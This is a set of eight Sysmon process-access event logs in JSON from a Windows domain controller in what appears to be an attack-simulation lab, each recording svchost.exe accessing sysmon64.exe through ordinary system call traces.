{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1313,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1314,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1315,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1316,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1317,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1318,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1319,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1320,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
